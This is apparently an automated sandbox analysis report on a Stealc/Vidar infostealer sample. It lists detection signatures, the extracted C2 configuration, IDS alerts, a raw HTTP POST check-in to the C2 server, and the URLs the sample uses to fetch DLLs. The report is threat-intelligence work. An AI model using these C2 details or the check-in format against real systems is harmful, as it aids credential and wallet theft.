Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1518819
MD5:	ef4d942f44362d48b109c8a182ba537d
SHA1:	b2732ce2977293e2f08e4ddfc0012a6673208692
SHA256:	fb2fdeded1386ef31205d4e56c05942f49b0292688d14bdc0616c22cae4567b3
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EF4D942F44362D48B109C8A182BA537D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7476	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7476	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7476	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.760000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:08.928677+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.8	49705	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:08.922535+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.8	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:09.151980+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.8	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:11.255448+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.8	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:09.159841+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.8	49705	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:08.686078+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49705	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T02:40:11.737711+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:16.693561+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:17.576689+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:18.203505+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:19.565133+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:21.932123+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:22.451460+0200	2803304	3	Unknown Traffic	192.168.2.8	49705	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 34 37 43 44 36 43 32 32 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"B547CD6C22534228319403------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"save------GIDBKKKKKFBGDGDHIDBG--

Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll8
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllJ
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllg
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlly
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll0
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllV
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/b
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dllA
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1638110314.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdowsApps
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpll
Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1638110314.0000000001278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37d
Source: file.exe, 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpefox
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666695597.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1589811279.000000002F9A0000.00000004.00000020.00020000.00000000.sdmp, CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

